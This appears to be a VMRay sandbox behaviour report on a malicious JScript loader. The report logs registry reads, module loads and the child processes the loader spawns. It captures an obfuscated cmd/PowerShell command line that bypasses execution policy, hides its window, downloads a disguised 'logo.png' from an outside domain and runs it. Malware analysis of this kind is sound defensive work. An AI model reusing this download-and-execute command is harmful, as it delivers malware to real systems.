Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 240, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 240, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 240, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 240, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create cmd.exe show_window = 3254896 True 1
Fn
Module (25)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff1f0000 True 3
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 1
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefea62e18 True 1
Fn
Get Address c:\windows\system32\wscript.exe function = 1, address_out = 0xff1fd7f8 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 5200480 True 1
Fn
System (71)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:47:24 (UTC) True 1
Fn
Get Time type = Ticks, time = 212223 True 1
Fn
Get Time type = Performance Ctr, time = 26690322788 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:47:25 (UTC) True 3
Fn
Get Time type = Ticks, time = 213268 True 1
Fn
Get Time type = Performance Ctr, time = 26795707496 True 1
Fn
Get Time type = Ticks, time = 213284 True 2
Fn
Get Time type = Ticks, time = 213534 True 1
Fn
Get Time type = Performance Ctr, time = 26822247545 True 1
Fn
Get Time type = Ticks, time = 213658 True 1
Fn
Get Time type = Performance Ctr, time = 26834217934 True 1
Fn
Get Time type = Ticks, time = 213908 True 1
Fn
Get Time type = Ticks, time = 213924 True 2
Fn
Get Time type = Ticks, time = 214470 True 5
Fn
Get Time type = Ticks, time = 214579 True 10
Fn
Get Time type = Ticks, time = 214594 True 7
Fn
Get Time type = Ticks, time = 214610 True 4
Fn
Get Time type = Ticks, time = 214719 True 4
Fn
Get Time type = Ticks, time = 214735 True 4
Fn
Get Time type = Ticks, time = 214750 True 2
Fn
Get Time type = Ticks, time = 214860 True 1
Fn
Get Time type = Ticks, time = 214875 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:47:27 (UTC) True 1
Fn
Get Time type = Ticks, time = 214891 True 2
Fn
Get Time type = Performance Ctr, time = 26957309841 True 1
Fn
Get Time type = Ticks, time = 215000 True 2
Fn
Get Info type = Operating System True 5
Fn
Get Info type = System Directory, result_out = î1 True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #46: cmd.exe
62 0
»
Information Value
ID #46
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:02:26, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:01:59
OS Process Information
»
Information Value
PID 0xd88
Parent PID 0xd50 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x D8C
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info PowErshelL.eXe type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xda4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:47:30 (UTC) True 1
Fn
Get Time type = Ticks, time = 218136 True 1
Fn
Get Time type = Performance Ctr, time = 27282847864 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 3
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #47: powershell.exe
330 0
»
Information Value
ID #47
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:02:28, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:01:56
OS Process Information
»
Information Value
PID 0xda4
Parent PID 0xd88 (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x DA8
0x DAC
0x DB0
0x DB4
0x DB8
0x DBC
0x DC4
0x DC8
Host Behavior
File (73)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (79)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value - value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (5)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment (91)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 84
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image